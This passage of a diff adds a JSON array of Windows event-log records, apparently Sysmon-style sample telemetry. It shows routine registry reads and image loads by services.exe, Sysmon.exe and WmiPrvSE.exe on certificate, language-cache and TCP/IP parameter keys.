"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, 
+ "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "utildll.dll", + "image_path": "C:\\Windows\\System32\\utildll.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": 
"Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
